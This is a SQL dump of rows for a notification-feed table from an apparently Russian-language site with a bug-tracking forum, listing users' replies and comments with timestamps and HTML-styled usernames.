INSERT INTO lenta VALUES("24","21","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426432438","0","forum3");
INSERT INTO lenta VALUES("25","1","elfi оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426432694","0","forum2");
INSERT INTO lenta VALUES("26","1","ICE оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426433630","0","forum2");
INSERT INTO lenta VALUES("27","1","ICE оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426433687","0","forum3");
INSERT INTO lenta VALUES("28","30","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426433726","0","forum3");
INSERT INTO lenta VALUES("29","1","ICE оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1426433793","0","forum1");
INSERT INTO lenta VALUES("30","30","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1426433909","0","forum1");
INSERT INTO lenta VALUES("31","1","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426433983","0","forum3");
INSERT INTO lenta VALUES("32","30","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426434031","0","forum3");
INSERT INTO lenta VALUES("33","1","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426434105","0","forum3");
INSERT INTO lenta VALUES("34","1","fenomen оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426434240","0","forum2");
INSERT INTO lenta VALUES("35","30","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426434251","0","forum3");
INSERT INTO lenta VALUES("36","32","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426434321","0","forum2");
INSERT INTO lenta VALUES("37","1","fenomen ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426434416","0","forum2");
INSERT INTO lenta VALUES("38","1","bypass оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426434453","0","forum2");
INSERT INTO lenta VALUES("39","32","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426434454","0","forum2");
INSERT INTO lenta VALUES("40","1","vinkh оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426434537","0","forum5");
INSERT INTO lenta VALUES("41","27","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426434990","0","forum5");
INSERT INTO lenta VALUES("42","1","maximfray оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426435057","0","forum2");
INSERT INTO lenta VALUES("43","30","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426435064","0","forum5");
INSERT INTO lenta VALUES("44","1","fenomen ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426435094","0","forum2");
INSERT INTO lenta VALUES("45","32","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426435187","0","forum2");
INSERT INTO lenta VALUES("46","27","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426435327","0","forum5");
INSERT INTO lenta VALUES("47","1","fenomen ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426435699","0","forum2");
INSERT INTO lenta VALUES("48","1","fenomen оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426435901","0","forum5");
INSERT INTO lenta VALUES("49","1","fenomen оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426435902","0","forum5");
INSERT INTO lenta VALUES("50","1","Elitawap оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426436015","0","forum5");
INSERT INTO lenta VALUES("59","1","Elitawap оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1426436421","0","forum1");
INSERT INTO lenta VALUES("60","1","vinkh оставил комментарий к Вашему <a href=\"disk/info.php?i=36\">файлу</a>!","comments","1426436541","0","fo36");
INSERT INTO lenta VALUES("52","1","Elitawap ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426436094","0","forum2");
INSERT INTO lenta VALUES("56","1","bypass ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=6&page=\">обсуждении</a>!","comments","1426436247","0","forum6");
INSERT INTO lenta VALUES("57","1","Elitawap ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426436263","0","forum2");
INSERT INTO lenta VALUES("58","1","Elitawap оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426436326","0","forum3");
INSERT INTO lenta VALUES("54","1","Elitawap ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426436177","0","forum5");
INSERT INTO lenta VALUES("55","36","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=6&page=\">обсуждении</a>!","comments","1426436181","0","forum6");
INSERT INTO lenta VALUES("63","1","IronnHeart оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426436676","0","forum5");
INSERT INTO lenta VALUES("64","36","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=6&page=\">обсуждении</a>!","comments","1426436712","0","forum6");
INSERT INTO lenta VALUES("65","21","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426436751","0","forum5");
INSERT INTO lenta VALUES("67","36","Elitawap ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1426436988","0","forum1");
INSERT INTO lenta VALUES("68","1","bypass ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=6&page=\">обсуждении</a>!","comments","1426437066","0","forum6");
INSERT INTO lenta VALUES("69","36","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=6&page=\">обсуждении</a>!","comments","1426437101","0","forum6");
INSERT INTO lenta VALUES("70","1","fenomen оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=4&page=\">обсуждении</a>!","comments","1426437133","0","forum4");
INSERT INTO lenta VALUES("71","1","ICE оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=4&page=\">обсуждении</a>!","comments","1426437185","0","forum4");
INSERT INTO lenta VALUES("72","1","bypass ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=6&page=\">обсуждении</a>!","comments","1426437198","0","forum6");
INSERT INTO lenta VALUES("73","21","Elitawap ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426437243","0","forum5");
INSERT INTO lenta VALUES("74","36","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=6&page=\">обсуждении</a>!","comments","1426437253","0","forum6");
INSERT INTO lenta VALUES("75","36","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=6&page=\">обсуждении</a>!","comments","1426437279","0","forum6");
INSERT INTO lenta VALUES("77","1","bypass ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=6&page=\">обсуждении</a>!","comments","1426437301","0","forum6");
INSERT INTO lenta VALUES("78","36","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=6&page=\">обсуждении</a>!","comments","1426437450","0","forum6");
INSERT INTO lenta VALUES("79","36","Elitawap ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1426437736","0","forum1");
INSERT INTO lenta VALUES("80","1","Nravo оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426437737","0","forum5");
INSERT INTO lenta VALUES("81","1","bypass оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426437825","0","forum5");
INSERT INTO lenta VALUES("84","36","Elitawap ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1426437886","0","forum1");
INSERT INTO lenta VALUES("85","1","Elitawap ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426438001","0","forum5");
INSERT INTO lenta VALUES("87","36","Elitawap ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1426438135","0","forum1");
INSERT INTO lenta VALUES("89","36","Elitawap ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1426438551","0","forum1");
INSERT INTO lenta VALUES("90","1","<span style=\"color: #330000\">N</span><span style=\"color: #660000\">r</span><span style=\"color: #990000\">a</span><span style=\"color: #CC0000\">v</span><span style=\"color: #FF0000\">o</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=4&page=\">обсуждении</a>!","comments","1426438758","0","forum4");
INSERT INTO lenta VALUES("91","1","Elitawap оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=4&page=\">обсуждении</a>!","comments","1426439085","0","forum4");
INSERT INTO lenta VALUES("92","1","bypass оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=4&page=\">обсуждении</a>!","comments","1426439105","0","forum4");
INSERT INTO lenta VALUES("93","7","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=71&t=8&page=\">обсуждении</a>!","comments","1426439421","0","forum8");
INSERT INTO lenta VALUES("94","1","Elitawap оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426439924","0","forum3");
INSERT INTO lenta VALUES("95","1","Elitawap оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=4&page=\">обсуждении</a>!","comments","1426441285","0","forum4");
INSERT INTO lenta VALUES("96","36","Elitawap оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=10&page=\">обсуждении</a>!","comments","1426441480","0","forum10");
INSERT INTO lenta VALUES("98","36","nab1r ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=10&page=\">обсуждении</a>!","comments","1426442309","0","forum10");
INSERT INTO lenta VALUES("100","36","nab1r ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=10&page=\">обсуждении</a>!","comments","1426442482","0","forum10");
INSERT INTO lenta VALUES("101","36","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=10&page=\">обсуждении</a>!","comments","1426442671","0","forum10");
INSERT INTO lenta VALUES("102","18","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426442845","0","forum11");
INSERT INTO lenta VALUES("103","1","test ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426442893","0","forum11");
INSERT INTO lenta VALUES("104","1","bypass ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=10&page=\">обсуждении</a>!","comments","1426442998","0","forum10");
INSERT INTO lenta VALUES("105","36","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=10&page=\">обсуждении</a>!","comments","1426443240","0","forum10");
INSERT INTO lenta VALUES("106","18","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426443321","0","forum11");
INSERT INTO lenta VALUES("107","18","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426443481","0","forum11");
INSERT INTO lenta VALUES("108","27","Оставлено сообщение в новостях проэкта <a href=\"news_of_project.asp?do=open&news=34\">Открытие сайта</a>.","comments","1426443622","0","new34");
INSERT INTO lenta VALUES("109","1","bypass ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=10&page=\">обсуждении</a>!","comments","1426444535","0","forum10");
INSERT INTO lenta VALUES("110","27","test ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426444550","0","forum11");
INSERT INTO lenta VALUES("111","36","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=10&page=\">обсуждении</a>!","comments","1426444590","0","forum10");
INSERT INTO lenta VALUES("112","18","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426444622","0","forum11");
INSERT INTO lenta VALUES("113","1","test ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426444641","0","forum11");
INSERT INTO lenta VALUES("114","27","test ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426444681","0","forum11");
INSERT INTO lenta VALUES("115","18","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426444789","0","forum11");
INSERT INTO lenta VALUES("116","27","test ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426444877","0","forum11");
INSERT INTO lenta VALUES("117","18","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426444890","0","forum11");
INSERT INTO lenta VALUES("118","18","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426444950","0","forum11");
INSERT INTO lenta VALUES("119","1","test ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426445047","0","forum11");
INSERT INTO lenta VALUES("120","18","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426445372","0","forum11");
INSERT INTO lenta VALUES("121","18","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426445524","0","forum11");
INSERT INTO lenta VALUES("122","1","test оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426445544","0","forum2");
INSERT INTO lenta VALUES("123","18","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426445578","0","forum11");
INSERT INTO lenta VALUES("124","1","test ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426445650","0","forum11");
INSERT INTO lenta VALUES("125","18","bypass ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426445654","0","forum11");
INSERT INTO lenta VALUES("126","18","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426445784","0","forum11");
INSERT INTO lenta VALUES("127","36","test ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426446005","0","forum11");
INSERT INTO lenta VALUES("128","1","test ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426446132","0","forum11");
INSERT INTO lenta VALUES("129","7","Оставлено сообщение в новостях проэкта <a href=\"news_of_project.asp?do=open&news=34\">Открытие сайта</a>.","comments","1426454700","0","new34");
INSERT INTO lenta VALUES("130","36","TheAlex ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426454814","0","forum11");
INSERT INTO lenta VALUES("131","1","TheAlex оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426454969","0","forum2");
INSERT INTO lenta VALUES("132","1","TheAlex оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=4&page=\">обсуждении</a>!","comments","1426455027","0","forum4");
INSERT INTO lenta VALUES("133","1","TheAlex оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1426455242","0","forum1");
INSERT INTO lenta VALUES("134","1","TheAlex оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426455259","0","forum5");
INSERT INTO lenta VALUES("135","41","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426456782","0","forum5");
INSERT INTO lenta VALUES("136","1","DarkMs оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426482358","0","forum3");
INSERT INTO lenta VALUES("137","44","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426482559","1","forum3");
INSERT INTO lenta VALUES("138","1","Groznyy оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426486345","0","forum5");
INSERT INTO lenta VALUES("139","1","Groznyy оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426486902","0","forum2");
INSERT INTO lenta VALUES("167","1","<span style=\"color: #250000\">G</span><span style=\"color: #4A0000\">r</span><span style=\"color: #6F0000\">o</span><span style=\"color: #940000\">z</span><span style=\"color: #B90000\">n</span><span style=\"color: #DE0000\">y</span><span style=\"color: #FF0000\">y</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=78&t=14&page=\">обсуждении</a>!","comments","1426497498","0","forum14");
INSERT INTO lenta VALUES("141","27","<span style=\"color: #250000\">G</span><span style=\"color: #4A0000\">r</span><span style=\"color: #6F0000\">o</span><span style=\"color: #940000\">z</span><span style=\"color: #B90000\">n</span><span style=\"color: #DE0000\">y</span><span style=\"color: #FF0000\">y</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426489076","0","forum2");
INSERT INTO lenta VALUES("142","41","Оставлено сообщение в новостях проэкта <a href=\"news_of_project.asp?do=open&news=34\">Открытие сайта</a>.","comments","1426489146","0","new34");
INSERT INTO lenta VALUES("143","27","<span style=\"color: #250000\">G</span><span style=\"color: #4A0000\">r</span><span style=\"color: #6F0000\">o</span><span style=\"color: #940000\">z</span><span style=\"color: #B90000\">n</span><span style=\"color: #DE0000\">y</span><span style=\"color: #FF0000\">y</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426489219","0","forum12");
INSERT INTO lenta VALUES("166","1","<span style=\"color: #250000\">G</span><span style=\"color: #4A0000\">r</span><span style=\"color: #6F0000\">o</span><span style=\"color: #940000\">z</span><span style=\"color: #B90000\">n</span><span style=\"color: #DE0000\">y</span><span style=\"color: #FF0000\">y</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=78&t=14&page=\">обсуждении</a>!","comments","1426497441","0","forum14");
